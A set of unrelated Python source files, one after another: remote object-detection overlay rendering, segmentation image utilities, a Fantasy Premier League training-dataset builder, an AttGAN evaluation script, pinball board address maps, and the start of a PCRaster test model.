    """Dump the detected objects and current inference rate to stdout."""
    print('\nInference (rate=%.2f fps):' % inference_rate)
    for index, obj in enumerate(objs):
        print('    %d: %s, area=%.2f' % (index, obj, obj.bbox.area))
def render_gen(args, stub):
    """Generator driving remote (gRPC) object detection and overlay rendering.

    Protocol: first yields the expected (width, height) of input frames,
    then on every send() of (tensor, layout, command) yields the SVG overlay
    string, or None while the overlay is toggled off.

    args: parsed CLI namespace (see add_render_gen_args).
    stub: gRPC stub exposing Infer(ImageBatch).
    """
    fps_counter = utils.avg_fps_counter(30)
    interpreters, titles = utils.make_interpreters(args.model)
    assert utils.same_input_image_sizes(interpreters)
    interpreters = itertools.cycle(interpreters)
    interpreter = next(interpreters)
    labels = utils.load_labels(args.labels) if args.labels else None
    # Reverse map (label name -> id) used to rebuild detect.Object from replies.
    labels_to_ids = dict(zip(labels.values(), labels.keys()))
    filtered_labels = set(l.strip() for l in args.filter.split(',')) if args.filter else None
    get_color = make_get_color(args.color, labels)
    draw_overlay = True
    width, height = utils.input_image_size(interpreter)
    yield width, height
    output = None
    while True:
        tensor, layout, command = (yield output)
        inference_rate = next(fps_counter)
        if draw_overlay:
            start = time.monotonic()
            try:
                # NOTE(review): assumes the camera tensor is exactly 300x300
                # RGB -- confirm against the model input size reported above.
                reshaped = np.reshape(tensor, (300, 300, 3))
                img = Image.fromarray(reshaped)
                img_byte_arr = io.BytesIO()
                img.save(img_byte_arr, format='JPEG')
                # Ship the JPEG-encoded frame to the remote inference service.
                imagebatch = inferencedata_pb2.ImageBatch()
                for i in range(1):
                    imagepb = imagebatch.images.add()
                    imagepb.id = i + 1
                    imagepb.image_data = img_byte_arr.getvalue()
                response = stub.Infer(imagebatch)
                # print(response)
                # edgetpu.run_inference(interpreter, tensor)
                # objs = [
                #     detect.Object(labels_to_ids[box.label],
                #                   box.label,
                #                   detect.BBox(box.xmin, box.ymin, box.xmax, box.ymax))
                #     for result in response.results for box in result.boxes if (box.score > args.threshold and box.label in filtered_labels)
                # ]
                objs = []
                for result in response.results:
                    for box in result.boxes:
                        if box.score > args.threshold and box.label in filtered_labels:
                            objs.append(detect.Object(labels_to_ids[box.label], box.score, detect.BBox(box.xmin, box.ymin, box.xmax, box.ymax)))
            except Exception as e:
                # Best-effort: keep streaming frames even if one inference fails.
                print(e)
            inference_time = time.monotonic() - start
            # objs = detect.get_objects(interpreter, args.threshold)[:args.top_k]
            # if labels and filtered_labels:
            #     objs = [obj for obj in objs if labels[obj.id] in filtered_labels]
            # objs = []
            # Drop detections outside the configured normalized-area window.
            objs = [obj for obj in objs \
                    if args.min_area <= obj.bbox.scale(1.0 / width, 1.0 / height).area <= args.max_area]
            if args.print:
                print_results(inference_rate, objs)
            title = titles[interpreter]
            output = overlay(title, objs, get_color, labels, inference_time, inference_rate, layout)
        else:
            output = None
        # Keyboard commands: 'o' toggles the overlay, 'n' would cycle models.
        if command == 'o':
            draw_overlay = not draw_overlay
        elif command == 'n':
            print("'n' doesn't work with remote inference")
            # interpreter = next(interpreters)
def add_render_gen_args(parser):
    """Register render_gen's CLI flags on *parser* (an argparse.ArgumentParser)."""
    parser.add_argument('--model',
                        help='.tflite model path', required=True)
    parser.add_argument('--labels',
                        help='labels file path')
    parser.add_argument('--top_k', type=int, default=50,
                        help='Max number of objects to detect')
    parser.add_argument('--threshold', type=float, default=0.1,
                        help='Detection threshold')
    parser.add_argument('--min_area', type=float, default=0.0,
                        help='Min bounding box area')
    parser.add_argument('--max_area', type=float, default=1.0,
                        help='Max bounding box area')
    parser.add_argument('--filter', default=None,
                        help='Comma-separated list of allowed labels')
    # BUG FIX: a stray trailing comma here used to turn this statement into a
    # pointless tuple expression.
    parser.add_argument('--color', default=None,
                        help='Bounding box display color')
    parser.add_argument('--print', default=False, action='store_true',
                        help='Print inference results')
def main():
    """Entry point: wire the detection renderer into the shared app runner."""
    run_app(add_render_gen_args, render_gen)
if __name__ == '__main__':
    main()
|
import numpy as np
from matplotlib import pyplot as plt
from keras.callbacks import Callback
from functools import reduce
import pyvips as Vips
import random
# libvips band format name -> numpy dtype, used by vips_to_np() when
# reinterpreting a raw vips memory buffer as an ndarray.
format_to_dtype = {
    'uchar': np.uint8,
    'char': np.int8,
    'ushort': np.uint16,
    'short': np.int16,
    'uint': np.uint32,
    'int': np.int32,
    'float': np.float32,
    'double': np.float64,
    'complex': np.complex64,
    'dpcomplex': np.complex128,
}
def vips_to_np(im):
    """Convert a pyvips image into a numpy array of shape (height, width, bands)."""
    buf = im.write_to_memory()
    flat = np.frombuffer(buf, dtype=format_to_dtype[im.format])
    return flat.reshape(im.height, im.width, im.bands)
class Previewer(Callback):
    """Keras callback that renders model-prediction previews after each epoch."""
    def __init__(self, generator, number_of_images=2, save_path=None):
        # BUG FIX: the original called ``super()`` without ``.__init__()``,
        # which merely builds the proxy object and never initializes Callback.
        super().__init__()
        self.generator = generator
        self.number_of_images = number_of_images
        self.save_path = save_path
    def on_epoch_end(self, epoch, logs={}):
        """Render a preview figure; save it when a save-path template is set."""
        fig = preview_model(self.model, self.generator, self.number_of_images)
        if self.save_path:
            # save_path is a str.format template receiving the epoch number.
            fig.savefig(self.save_path.format(epoch))
def preview_model(model, generator, images, weights_path=None, labels=False):
    """Plot prediction / input / ground-truth columns for a few frames.

    model: Keras model used for predictions.
    generator: provides .images[0] (frame source), .output_shape and .classes.
    images: either a list of explicit frame indices, or an int count of random
        frames to sample (near-white frames with mean > 230 are skipped).
    weights_path: optional weights file to load into the model first.
    labels: when True, title each subplot with its frame index.

    Returns the matplotlib figure.
    NOTE(review): with n_images == 1, plt.subplots returns a 1-D axes array
    and the axarr[n][0] indexing below would fail -- verify callers pass >= 2.
    """
    if weights_path != None:
        model.load_weights(weights_path)
    n_images = len(images) if type(images) == list else images
    rs=list(range(generator.images[0].total_frames))
    fig, axarr = plt.subplots(n_images,3,figsize=(20,6*n_images))
    n=0
    test_ids=images if type(images) == list else []
    test_images=[generator.images[0].get_single(i) for i in test_ids]
    # Top up with random frames until we have enough, skipping blank-ish ones.
    while len(test_images) < n_images:
        i=random.choice(rs)
        orig=generator.images[0].get_single(i)
        if orig.mean() > 230:
            continue
        test_ids += [i]
        test_images += [orig]
        n+=1
    predictions=model.predict(np.asarray(test_images))
    for n,i in enumerate(test_ids):
        predicted=predictions[n].reshape((generator.output_shape[0],generator.output_shape[1],generator.classes))
        # Column 0: predicted classes, column 1: input frame, column 2: ground truth.
        axarr[n][0].imshow(np.argmax(predicted,axis=2),vmax=4,vmin=0,cmap='hot')
        axarr[n][1].imshow(test_images[n])
        axarr[n][2].imshow(np.argmax(generator.images[0].mask.get(i),axis=2),vmax=4,vmin=0,cmap='hot')
        if labels:
            axarr[n][0].set_title(str(i))
            axarr[n][1].set_title(str(i))
            axarr[n][2].set_title(str(i))
    plt.show()
    return fig
def to_categorical(im, n_features=0):
    """One-hot encode an indexed vips image into one band per class.

    im: vips image whose pixel values are class indices.
    n_features: number of classes; 0 means auto-detect from the histogram.

    Returns (categorical_image, n_features).  If the histogram shows the
    image is already binary (all pixels in the first or last bin), the image
    is returned unchanged.
    """
    if (n_features == 0):
        hist = im.hist_find()
        # All mass in min+max bins -> already a binary mask; nothing to split.
        if hist(0,0)+hist(hist.width-1,0) == im.width*im.height:
            n_features = 2
            return im, n_features
        else:
            # Highest populated histogram bin determines the class count.
            for n in range(hist.width):
                c = hist(n,0)
                if c != [0.0]:
                    n_features = n+1
    # Band k of the result is the mask (im == k).
    categorical = im == 0
    for klass in range(1,n_features):
        categorical = categorical.bandjoin(im == int(klass))
    return categorical, n_features
def flatten(image, n):
    """Rescale a 0-255 mask band so its maximum becomes *n*, cast to uchar."""
    scaled = (image / 255.0) * n
    return scaled.cast('uchar')
def from_categorical(im):
    """Collapse a one-hot vips image back into a single indexed band.

    Band 0 (background) is dropped; each remaining band is masked so a pixel
    can belong to only one class, then the bands are OR-combined with their
    class index as the pixel value.
    """
    template = im.bandsplit()[1:im.bands]
    bands = im.bands-1
    for band in range(bands):
        # Clear any pixel that another band also claims (ties go to nobody).
        template[band] = reduce(lambda a,b: a&~b,[template[i] for i in range(bands) if i!=band],template[band])
    result = Vips.Image.black(im.width,im.height)
    for band in range(0, bands):
        # Band k contributes pixel value k+1 (0 stays background).
        result |= flatten(template[band],band+1)
    return result
def resize_indexed(im, width, height):
    """Resize an indexed (label) image without blending class values.

    The image is one-hot encoded, each band resized and re-thresholded,
    then collapsed back to class indices.
    """
    categorical = to_categorical(im)[0]
    resized = resize_categorical(categorical, width, height)
    return from_categorical(resized)
def resize_categorical(cat_image, width, height):
    """Resize the bands of a one-hot image to (width, height), re-binarizing.

    NOTE(review): reduce() seeds with the first band *unmodified*, so band 0
    is joined without being resized or thresholded -- preserved as-is here;
    verify this is intentional (from_categorical drops band 0 anyway).
    """
    hscale = width / cat_image.width
    vscale = height / cat_image.height
    joined = None
    for band in cat_image.bandsplit():
        if joined is None:
            joined = band
        else:
            joined = joined.bandjoin(band.resize(hscale, vscale=vscale) >= 63)
    return joined
def show_vips_im(im):
    """Display a pyvips image in a large matplotlib figure."""
    plt.figure(figsize=(40, 40))
    plt.imshow(vips_to_np(im))
def show_np_im(im):
    """Display a numpy image array in a large matplotlib figure."""
    plt.figure(figsize=(40, 40))
    plt.imshow(im)
|
#!/usr/bin/env python
# coding: utf-8
# ### Create player training dataset for player model
#
# - Get all able players, loop through their history, append game features of those games
# - Receive the predicted scoreline to make the dataset ready for prediction
# In[1]:
import numpy as np
import pandas as pd
pd.options.display.max_rows = None
import requests
pd.set_option('display.max_columns', None)
# In[91]:
class player():
    """Builds a Fantasy Premier League training dataset from the public FPL API.

    Downloads the selectable player pool, engineers per-90 and recent-form
    features for each player's gameweek history, aligns the prediction and
    training frames, merges in predicted scorelines produced by a fixture
    model, and buckets each historical gameweek's points into a label for
    classification.
    """

    def __init__(self, data, gameweek_index=39):
        #get gameweek index to see which gameweek should be used for prediction and up until what gameweek for training
        # data: fixture-model output; expected to expose columns
        # "team H", "team A", "team_h_score", "team_a_score" -- TODO confirm with caller.
        self.results = data
        # Stored zero-based: rows before this index are used for training.
        self.gameweek_index = gameweek_index - 1
        self.train()

    def train(self):
        # Run the full data-preparation pipeline, in dependency order.
        self.get_able_players()
        self.make_player_dataset()
        self.organise()
        self.receive_scoreline()
        self.label_data()

    def get_able_players(self):
        # Get the players which are avaialble for selection
        # @param none
        # @return none
        url = 'https://fantasy.premierleague.com/api/bootstrap-static/'
        r = requests.get(url)
        json = r.json()  # NOTE(review): local name shadows the `json` module if imported
        stats_df = pd.DataFrame(json['element_stats'])  # NOTE(review): never used
        elements_df = pd.DataFrame(json['elements'])
        # Drop bookkeeping/presentation columns that are not model features.
        del elements_df["chance_of_playing_next_round"]
        del elements_df["chance_of_playing_this_round"]
        del elements_df["cost_change_event"]
        del elements_df["cost_change_event_fall"]
        del elements_df["cost_change_start"]
        del elements_df["cost_change_start_fall"]
        del elements_df["dreamteam_count"]
        del elements_df["transfers_in"]
        del elements_df["transfers_in_event"]
        del elements_df["transfers_out"]
        del elements_df["transfers_out_event"]
        del elements_df["photo"]
        del elements_df["in_dreamteam"]
        del elements_df["news"]
        del elements_df["form"]
        del elements_df["code"]
        del elements_df["first_name"]
        del elements_df["news_added"]
        del elements_df["special"]
        del elements_df["corners_and_indirect_freekicks_order"]
        del elements_df["corners_and_indirect_freekicks_text"]
        del elements_df["direct_freekicks_order"]
        del elements_df["direct_freekicks_text"]
        del elements_df["penalties_order"]
        del elements_df["penalties_text"]
        del elements_df["ict_index_rank_type"]
        del elements_df["ict_index_rank"]
        del elements_df["creativity_rank_type"]
        del elements_df["creativity_rank"]
        del elements_df["influence_rank"]
        del elements_df["influence_rank_type"]
        del elements_df["threat_rank"]
        del elements_df["threat_rank_type"]
        del elements_df["value_season"]
        all_players_df = elements_df
        # Keep every player whose status is not "u" (presumably "unavailable").
        self.all_players_df = all_players_df[all_players_df.status != "u"]

    def make_player_dataset(self):
        #Method to make the player training dataset - loop through each players history annd append features
        #@params None
        #@return None
        dataset = self.all_players_df
        # Pre-create the engineered feature columns.
        dataset["goals_per_90"] = 0.0
        dataset["assists_per_90"] = 0.0
        dataset["clean_sheets_per_90"] = 0.0
        dataset["goals_conceded_per_90"] = 0.0
        dataset["points_pg"] = 0.0
        dataset["minutes_last3"] = 0.0
        dataset["bonus_last5"] = 0.0
        train_df = pd.DataFrame()
        # Players with zero season minutes carry no signal.
        dataset = dataset[dataset["minutes"] != 0]
        for index, row in dataset.iterrows():
            #grab the player information of each player in the dataset
            player_id = dataset["id"][index]
            # One API request per player: this loop is network-bound.
            url = 'https://fantasy.premierleague.com/api/element-summary/' + str(int(player_id)) + "/"
            r = requests.get(url)
            json = r.json()
            player_history_df = pd.DataFrame(json["history"])
            # Strip per-match columns that are not used as features.
            del player_history_df["fixture"]
            del player_history_df["opponent_team"]
            del player_history_df["kickoff_time"]
            del player_history_df["round"]
            del player_history_df["own_goals"]
            del player_history_df["penalties_saved"]
            del player_history_df["penalties_missed"]
            del player_history_df["yellow_cards"]
            del player_history_df["red_cards"]
            del player_history_df["saves"]
            del player_history_df["value"]
            del player_history_df["bps"]
            del player_history_df["transfers_balance"]
            del player_history_df["selected"]
            del player_history_df["transfers_in"]
            del player_history_df["transfers_out"]
            del player_history_df["element"]
            player_history_df["points_gained"] = 0
            player_history_df.insert(loc=0, column='element_type', value=0)
            goals, assists, clean_sheets, minutes, points, goals_conceded = 0, 0, 0, 0, 0, 0
            point_form = []
            # Only gameweeks before the prediction gameweek feed training.
            split = self.gameweek_index
            for _index, _row in player_history_df[:split].iterrows():
                # Accumulate season-to-date totals row by row.
                goals_x = player_history_df["goals_scored"][_index]
                goals += goals_x
                assists_x = player_history_df["assists"][_index]
                assists += assists_x
                clean_sheets_x = player_history_df["clean_sheets"][_index]
                clean_sheets += clean_sheets_x
                goals_conceded_x = player_history_df["goals_conceded"][_index]
                goals_conceded += goals_conceded_x
                minutes_x = player_history_df["minutes"][_index]
                minutes += minutes_x
                points_x = player_history_df["total_points"][_index]
                points += points_x
                point_form.append(points_x)
                # Running points-per-game up to and including this match.
                player_history_df.at[_index, "points_pg"] = sum(point_form) / len(point_form)
                player_history_df.at[_index, "element_type"] = dataset["element_type"][index]
                player_history_df.at[_index, "points_gained"] = player_history_df["total_points"][_index]
            #loop through again given we have the full point form
            matches_index = {}  # NOTE(review): assigned but never used
            i = 0
            for _index, _row in player_history_df[:split].iterrows():
                # Recent-form features only exist once 5 matches have been played.
                if i >= 5:
                    player_history_df.at[_index, "pointslast1"] = point_form[i-1]
                    player_history_df.at[_index, "pointslast3"] = sum(point_form[i-3:i])
                    player_history_df.at[_index, "pointslast5"] = sum(point_form[i-5:i])
                i += 1
            # The raw target column is kept only as "points_gained".
            del player_history_df["total_points"]
            #add the last recent form to the prediction model, to have the last match, last 3 and last 5 form
            dataset.at[index, "pointslast1"] = point_form[-1]
            dataset.at[index, "pointslast3"] = sum(point_form[-3:])
            dataset.at[index, "pointslast5"] = sum(point_form[-5:])
            train_df = train_df.append(player_history_df, ignore_index=True)
            #if no minutes played in a match, remove record
            if minutes > 0:
                # Normalise season totals to per-90-minute rates.
                dataset.at[index, "goals_per_90"] = (goals / minutes) * 90
                dataset.at[index, "assists_per_90"] = (assists / minutes) * 90
                dataset.at[index, "clean_sheets_per_90"] = (clean_sheets / minutes) * 90
                dataset.at[index, "goals_conceded_per_90"] = (goals_conceded / minutes) * 90
                dataset.at[index, "points_pg"] = (points / len(player_history_df))
            else:
                dataset = dataset.drop(index)
            #Calculate predicted minutes and bonus by averaging out the number of minutes in the last 5
            last_3_mins = 0
            last_5_bonus = 0
            # NOTE(review): the slices below mix a negative start with `split` as the
            # stop; when split < len-3 this selects nothing -- confirm intended.
            # Also: `i` here shadows the counter used in the loop above.
            for i, r in player_history_df[-3:split].iterrows():
                mins = player_history_df["minutes"][i]
                last_3_mins += mins
            for i, r in player_history_df[-5:split].iterrows():
                bonus = player_history_df["bonus"][i]
                last_5_bonus += bonus
            dataset.at[index, "minutes_last3"] = (last_3_mins / 3)
            dataset.at[index, "bonus_last5"] = (last_5_bonus / 5)
            #Calculate influence, creativity and threat per game by dividig by total No of Games
            influence = float(dataset["influence"][index])
            creativity = float(dataset["creativity"][index])
            threat = float(dataset["threat"][index])
            dataset.at[index, "influence"] = influence / len(player_history_df)
            dataset.at[index, "creativity"] = creativity / len(player_history_df)
            dataset.at[index, "threat"] = threat / len(player_history_df)
            # NOTE(review): this filtered frame is discarded -- train_df was
            # appended before the minutes==0 rows were removed.
            player_history_df = player_history_df[player_history_df['minutes'] != 0]
        # Drop prediction-frame columns that are not inputs to the model.
        del dataset["ep_next"]
        del dataset["ep_this"]
        del dataset["event_points"]
        del dataset["id"]
        del dataset["second_name"]
        del dataset["points_per_game"]
        del dataset["selected_by_percent"]
        del dataset["squad_number"]
        del dataset["status"]
        del dataset["total_points"]
        del dataset["goals_scored"]
        del dataset["assists"]
        del dataset["clean_sheets"]
        del dataset["goals_conceded"]
        del dataset["own_goals"]
        del dataset["penalties_saved"]
        del dataset["penalties_missed"]
        del dataset["yellow_cards"]
        del dataset["red_cards"]
        del dataset["bonus"]
        del dataset["bps"]
        del dataset["saves"]
        del dataset["value_form"]
        del dataset["ict_index"]
        del dataset["minutes"]
        del dataset["now_cost"]
        del train_df["ict_index"]
        #change was_home column from boolean value to int value
        train_df["was_home"] = train_df["was_home"] * 1
        #remove any columns with NaN values
        train_df = train_df.dropna()
        self.all_players_df = dataset
        self.train_df = train_df

    def organise(self):
        #Method to organise dataframes so they are the same for training and predicting
        #@params None
        #@return None
        self.all_players_df = self.all_players_df[["element_type",
                                                   "team",
                                                   "web_name",
                                                   "minutes_last3",
                                                   "goals_per_90",
                                                   "assists_per_90",
                                                   "clean_sheets_per_90",
                                                   "goals_conceded_per_90",
                                                   "bonus_last5",
                                                   "influence",
                                                   "creativity",
                                                   "threat",
                                                   "points_pg",
                                                   "pointslast1",
                                                   "pointslast3",
                                                   "pointslast5"]]
        self.train_df = self.train_df[['element_type',
                                       'was_home',
                                       'team_h_score',
                                       'team_a_score',
                                       'minutes',
                                       'goals_scored',
                                       'assists',
                                       'clean_sheets',
                                       'goals_conceded',
                                       'bonus',
                                       'influence',
                                       'creativity',
                                       'threat',
                                       'points_pg',
                                       'pointslast1',
                                       'pointslast3',
                                       'pointslast5',
                                       'points_gained']]

    def receive_scoreline(self):
        #Method to append scoreline from Fixture Model to data
        #@params None
        #@return None
        dataset = self.all_players_df
        results = self.results
        teams = []
        dataset.insert(loc=1, column='team_a_score', value=0)
        dataset.insert(loc=1, column='team_h_score', value=0)
        dataset.insert(loc=1, column='was_home', value=0)
        for index, row in dataset.iterrows():
            team_code = dataset["team"][index]
            # Find this player's team in the predicted fixtures and copy the
            # predicted score plus home/away flag.
            for _index, _row in results.iterrows():
                teamh = results["team H"][_index]
                teama = results["team A"][_index]
                if team_code == teamh:
                    dataset.at[index, "was_home"] = 1
                    dataset.at[index, "team_h_score"] = results["team_h_score"][_index]
                    dataset.at[index, "team_a_score"] = results["team_a_score"][_index]
                elif team_code == teama:
                    dataset.at[index, "was_home"] = 0
                    dataset.at[index, "team_h_score"] = results["team_h_score"][_index]
                    dataset.at[index, "team_a_score"] = results["team_a_score"][_index]
        # Collect the teams that actually appear in the fixture list.
        for index, row in results.iterrows():
            teamh = results["team H"][index]
            teama = results["team A"][index]
            teams.append(teamh)
            teams.append(teama)
        missed = []
        # Team ids 1-20 -- presumably the 20 Premier League clubs.
        for i in range(1, 21):
            if i not in teams:
                missed.append(i)
        #drop missed fixtures which didnt have a scoreline
        for each in missed:
            dataset = dataset[dataset.team != each]
        self.dataset = dataset
        self.dataset = self.dataset.dropna()

    def label_data(self):
        #1 = 0 points
        #2 = 1 points
        #3 = 2 points
        #4 = 3 points
        #5 = 4 points
        #6 = 5 points
        #7 = 6 points
        #8 = 7 points
        #9 = 8-9 points
        #10 = 10-11 points
        #11 = 12-14 points
        #12 = 15+ points
        # NOTE(review): the table above is shifted by one relative to the code
        # below, which assigns labels 1..13 (1 = negative points, 2 = 0 points,
        # ..., 12 = 12-14 points, 13 = 15+ since 13/14 match the branch above).
        player_results_df = self.train_df.copy()
        player_results_df["label"] = 0
        for index, row in player_results_df.iterrows():
            points = player_results_df["points_gained"][index]
            if points < 0:
                player_results_df.at[index, "label"] = 1
            elif points == 0:
                player_results_df.at[index, "label"] = 2
            elif points == 1:
                player_results_df.at[index, "label"] = 3
            elif points == 2:
                player_results_df.at[index, "label"] = 4
            elif points == 3:
                player_results_df.at[index, "label"] = 5
            elif points == 4:
                player_results_df.at[index, "label"] = 6
            elif points == 5:
                player_results_df.at[index, "label"] = 7
            elif points == 6:
                player_results_df.at[index, "label"] = 8
            elif points == 7:
                player_results_df.at[index, "label"] = 9
            elif points == 8 or points == 9:
                player_results_df.at[index, "label"] = 10
            elif points == 10 or points == 11:
                player_results_df.at[index, "label"] = 11
            elif points == 12 or points == 13 or points == 14:
                player_results_df.at[index, "label"] = 12
            elif points > 12:
                player_results_df.at[index, "label"] = 13
        # The raw target is no longer needed once bucketed.
        del player_results_df["points_gained"]
        self.player_results_df = player_results_df
# In[ ]:
|
<filename>model_zoo/research/cv/AttGAN/eval.py
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Entry point for testing AttGAN network"""
import argparse
import json
import math
import os
from os.path import join
import numpy as np
from PIL import Image
import mindspore.common.dtype as mstype
import mindspore.dataset as de
from mindspore import context, Tensor, ops
from mindspore.train.serialization import load_param_into_net
from src.attgan import Genc, Gdec
from src.cell import init_weights
from src.data import check_attribute_conflict
from src.data import get_loader, Custom
from src.helpers import Progressbar
from src.utils import resume_model, denorm
# Pin execution to the Ascend device selected by the launch environment.
device_id = int(os.getenv('DEVICE_ID'))  # raises TypeError if DEVICE_ID is unset
context.set_context(mode=context.PYNATIVE_MODE, device_target="Ascend", save_graphs=False, device_id=device_id)
def parse(arg=None):
    """Parse the command-line options controlling AttGAN evaluation.

    Args:
        arg: optional list of argument strings; ``None`` means argparse
            falls back to ``sys.argv``.

    Returns:
        argparse.Namespace with the parsed evaluation options.
    """
    p = argparse.ArgumentParser()
    add = p.add_argument
    add('--experiment_name', dest='experiment_name', required=True)
    add('--test_int', dest='test_int', type=float, default=1.0)
    add('--num_test', dest='num_test', type=int)
    add('--enc_ckpt_name', type=str, default='')
    add('--dec_ckpt_name', type=str, default='')
    add('--custom_img', action='store_true')
    add('--custom_data', type=str, default='../data/custom')
    add('--custom_attr', type=str, default='../data/list_attr_custom.txt')
    add('--shortcut_layers', dest='shortcut_layers', type=int, default=1)
    add('--inject_layers', dest='inject_layers', type=int, default=1)
    return p.parse_args(arg)
args_ = parse()
print(args_)
# Restore the training-time settings and overlay the CLI overrides on top.
with open(join('output', args_.experiment_name, 'setting.txt'), 'r') as f:
    args = json.load(f, object_hook=lambda d: argparse.Namespace(**d))
args.test_int = args_.test_int
args.num_test = args_.num_test
args.enc_ckpt_name = args_.enc_ckpt_name
args.dec_ckpt_name = args_.dec_ckpt_name
args.custom_img = args_.custom_img
args.custom_data = args_.custom_data
args.custom_attr = args_.custom_attr
args.shortcut_layers = args_.shortcut_layers
args.inject_layers = args_.inject_layers
args.n_attrs = len(args.attrs)
args.betas = (args.beta1, args.beta2)
print(args)
# Data loader
if args.custom_img:
    output_path = join("output", args.experiment_name, "custom_testing")
    os.makedirs(output_path, exist_ok=True)
    test_dataset = Custom(args.custom_data, args.custom_attr, args.attrs)
    test_len = len(test_dataset)
else:
    output_path = join("output", args.experiment_name, "sample_testing")
    os.makedirs(output_path, exist_ok=True)
    test_dataset = get_loader(args.data_path, args.attr_path,
                              selected_attrs=args.attrs,
                              mode="test"
                              )
    test_len = len(test_dataset)
dataset_column_names = ["image", "attr"]
num_parallel_workers = 8
ds = de.GeneratorDataset(test_dataset, column_names=dataset_column_names,
                         num_parallel_workers=min(32, num_parallel_workers))
# Batch size 1: the loop below edits one source image per iteration.
ds = ds.batch(1, num_parallel_workers=min(8, num_parallel_workers), drop_remainder=False)
test_dataset_iter = ds.create_dict_iterator()
if args.num_test is None:
    print('Testing images:', test_len)
else:
    print('Testing images:', min(test_len, args.num_test))
# Model loader
genc = Genc(mode='test')
gdec = Gdec(shortcut_layers=args.shortcut_layers, inject_layers=args.inject_layers, mode='test')
# Initialize network
init_weights(genc, 'KaimingUniform', math.sqrt(5))
init_weights(gdec, 'KaimingUniform', math.sqrt(5))
# Replace the random init with the checkpoint weights.
para_genc, para_gdec = resume_model(args, genc, gdec, args.enc_ckpt_name, args.dec_ckpt_name)
load_param_into_net(genc, para_genc)
load_param_into_net(gdec, para_gdec)
progressbar = Progressbar()  # NOTE(review): created but never used below
it = 0
for data in test_dataset_iter:
    img_a = data["image"]
    att_a = data["attr"]
    if args.num_test is not None and it == args.num_test:
        break
    att_a = Tensor(att_a, mstype.float32)
    # Build one attribute vector per single-attribute flip, plus the original.
    att_b_list = [att_a]
    for i in range(args.n_attrs):
        clone = ops.Identity()
        tmp = clone(att_a)
        tmp[:, i] = 1 - tmp[:, i]  # flip attribute i
        tmp = check_attribute_conflict(tmp, args.attrs[i], args.attrs)
        att_b_list.append(tmp)
    samples = [img_a]
    for i, att_b in enumerate(att_b_list):
        # Rescale {0,1} attributes to [-thres_int, thres_int].
        att_b_ = (att_b * 2 - 1) * args.thres_int
        if i > 0:
            # Amplify only the flipped attribute to +-test_int for a stronger edit.
            att_b_[..., i - 1] = att_b_[..., i - 1] * args.test_int / args.thres_int
        a_enc = genc(img_a)
        samples.append(gdec(a_enc, att_b_))
    # Tile original + edited images side by side (concat along width).
    cat = ops.Concat(axis=3)
    samples = cat(samples).asnumpy()
    result = denorm(samples)
    # assumes 128x128 model output -- TODO confirm against the network config
    result = np.reshape(result, (128, -1, 3))
    im = Image.fromarray(np.uint8(result))
    if args.custom_img:
        out_file = test_dataset.images[it]
    else:
        # 182638 is presumably the first index of the test split -- verify.
        out_file = "{:06d}.jpg".format(it + 182638)
    im.save(output_path + '/' + out_file)
    print('Successful save image in ' + output_path + '/' + out_file)
    it += 1
|
"""Defines for FAST Boards."""
# Platform name -> FAST hardware key code.
HARDWARE_KEY = dict(
    fast='2000',
    sys11='1100',
    wpc89='8900',
    wpc95='9500',
)
def _build_retro_switch_map():
    """Generate the retro switch-name -> two-digit-hex-address table."""
    table = {}
    address = 0
    # Matrix switches: rows 1-10, columns 1-8 -> addresses 0x00-0x4F.
    for row in range(1, 11):
        for col in range(1, 9):
            table['S%d%d' % (row, col)] = format(address, '02X')
            address += 1
    # Direct (SD) and Fliptronics (SF) switches follow the matrix. DIP switches
    # share the Fliptronics addresses but can be used in non-Fliptronics
    # machines (e.g. System11) as regular switches.
    for prefix, base in (('SD', 0x50), ('SF', 0x58), ('DIP', 0x58)):
        for offset in range(8):
            table['%s%d' % (prefix, offset + 1)] = format(base + offset, '02X')
    return table


RETRO_SWITCH_MAP = _build_retro_switch_map()
# Lamp matrix L{row}{col} (rows/cols 1-8) -> two-digit hex address 0x00-0x3F.
RETRO_LIGHT_MAP = {
    'L%d%d' % (row, col): format((row - 1) * 8 + (col - 1), '02X')
    for row in range(1, 9)
    for col in range(1, 9)
}
# Driver/coil name -> two-digit hex address.
RETRO_DRIVER_MAP = {
    # C01-C32 map linearly onto 0x00-0x1F.
    'C01': '00', 'C02': '01', 'C03': '02', 'C04': '03',
    'C05': '04', 'C06': '05', 'C07': '06', 'C08': '07',
    'C09': '08', 'C10': '09', 'C11': '0A', 'C12': '0B',
    'C13': '0C', 'C14': '0D', 'C15': '0E', 'C16': '0F',
    'C17': '10', 'C18': '11', 'C19': '12', 'C20': '13',
    'C21': '14', 'C22': '15', 'C23': '16', 'C24': '17',
    'C25': '18', 'C26': '19', 'C27': '1A', 'C28': '1B',
    'C29': '1C', 'C30': '1D', 'C31': '1E', 'C32': '1F',
    # C33-C44 skip 0x20-0x23 (used by the lower-flipper entries below).
    'C33': '24', 'C34': '25', 'C35': '26', 'C36': '27',
    'C37': '28', 'C38': '29', 'C39': '2A', 'C40': '2B',
    'C41': '2C', 'C42': '2D', 'C43': '2E', 'C44': '2F',
    # Flipper coils: lower flippers (FL*) use 0x20-0x23; upper flippers (FU*)
    # reuse 0x24-0x27, overlapping C33-C36 -- presumably a machine uses either
    # the upper flippers or those coil numbers; TODO confirm with FAST docs.
    'FLRM': '20', 'FLRH': '21', 'FLLM': '22', 'FLLH': '23',
    'FURM': '24', 'FURH': '25', 'FULM': '26', 'FULH': '27',
}
# General-illumination strings G01-G08 -> two-digit hex addresses 0x00-0x07.
RETRO_GI_MAP = {'G%02d' % (n + 1): format(n, '02X') for n in range(8)}
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import pcraster
import pcraster.framework.dynamicPCRasterBase as dynamicPCRasterBase
import pcraster.framework.mcPCRasterBase as mcPCRasterBase
import pcraster.framework.pfPCRasterBase as pfPCRasterBase
import pcraster.framework.staticPCRasterBase as staticPCRasterBase
class StaticWithoutAll(staticPCRasterBase.StaticModel, mcPCRasterBase.MonteCarloModel):
    """Static Monte Carlo model defining none of updateWeight/suspend/resume.

    Fixture -- presumably used to test the framework's validation of
    incomplete models; confirm against the accompanying test runner.
    """
    def __init__(self):
        staticPCRasterBase.StaticModel.__init__(self)
